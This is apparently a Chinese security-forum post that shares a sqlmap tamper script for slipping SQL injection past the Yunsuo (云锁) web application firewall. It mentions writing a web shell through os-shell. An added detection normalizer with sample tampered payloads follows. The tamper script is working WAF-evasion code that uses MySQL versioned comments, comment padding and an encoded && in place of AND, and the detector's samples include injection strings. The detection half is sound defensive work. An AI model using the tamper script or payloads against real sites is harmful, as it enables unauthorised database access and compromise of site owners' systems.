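sqlmap tamper script for bypassing Yunsuo (云锁)

This only gets through with UNION queries; the other test statements trigger a Yunsuo alert. A question for the experts here: can sqlmap be told to test with UNION only? os-shell can also write out the shell script, but executing commands afterwards triggers a Yunsuo alert.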

#!/usr/bin/env python

"""
Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""

import re

from lib.core.data import kb
from lib.core.enums import PRIORITY
from lib.core.common import singleTimeWarnMessage
from lib.core.enums import DBMS

__priority__ = PRIORITY.LOW

def dependencies():
    pass

def tamper(payload, **kwargs):
    # Wrap keywords in MySQL versioned comments (/*!00000 ... */), whose body the server executes
    payload = payload.replace('ORDER', '/*!00000order*/')
    # The versioned comment opened before "select" is closed by the "--" rule below
    payload = payload.replace('ALL SELECT', '/*!00000all*/ /*!00000select')
    # Put an empty comment between the function name and its parenthesis
    payload = payload.replace('CONCAT(', "CONCAT/**/(")
    payload = payload.replace("--", " */--")
    # URL-encoded "&&" in place of AND
    payload = payload.replace("AND", "%26%26")
    return payload
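
Added example, not part of the original post or of sqlmap: a detection-side normalizer that undoes the rewrites in the tamper script above (versioned comments, empty comments, URL-encoded &&) before a signature is applied. The names normalize, inspect and the patterns are hypothetical, and the sample inputs are constructed.

```python
import re
from urllib.parse import unquote

# Plain /* ... */ comments act as whitespace in MySQL.
PLAIN_COMMENT = re.compile(r"/\*(?!!).*?\*/", re.S)
# /*!NNNNN body */ is executed by MySQL when the server version is >= NNNNN,
# so the body must be treated as live SQL. An unterminated one is unwrapped
# to the end of the input (a conservative choice made by this example).
VERSIONED_COMMENT = re.compile(r"/\*!\d*(.*?)(?:\*/|\Z)", re.S)
# Illustrative signature only (assumption), not a complete rule set.
UNION_SELECT = re.compile(r"\bUNION\s+(?:ALL\s+|DISTINCT\s+)?SELECT\b", re.I)


def normalize(raw):
    """Undo the encodings used by the tamper script before matching."""
    text = unquote(raw)                          # %26%26 -> &&
    text = PLAIN_COMMENT.sub(" ", text)          # CONCAT/**/( -> CONCAT (
    text = VERSIONED_COMMENT.sub(r" \1 ", text)  # /*!00000all*/ -> all
    text = text.replace("&&", " AND ")           # MySQL treats && as AND
    return re.sub(r"\s+", " ", text).strip()


def inspect(raw):
    """Return the reasons a request parameter looks like tampered SQL."""
    reasons = []
    if re.search(r"/\*!0{5}", unquote(raw)):
        reasons.append("versioned comment /*!00000 (always executed)")
    if UNION_SELECT.search(normalize(raw)):
        reasons.append("UNION SELECT after normalization")
    return reasons


# Constructed samples: tamper-style output, an encoded AND, a benign value.
SAMPLES = [
    "1 UNION /*!00000all*/ /*!00000select NULL,CONCAT/**/(0x71,0x72) */-- -",
    "1 %26%26 5=5",
    "spring collection, all selected items",
]

if __name__ == "__main__":
    for sample in SAMPLES:
        print(repr(normalize(sample)), inspect(sample))
```

The raw-input check for /*!00000 is a useful signal by itself: a version number of zero makes the comment body execute on every server, which ordinary application traffic has no reason to send.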
零组资料文库, all rights reserved, powered by 0-sec.org. Reproduction without authorization is prohibited. 2019-11-03 17:45:44
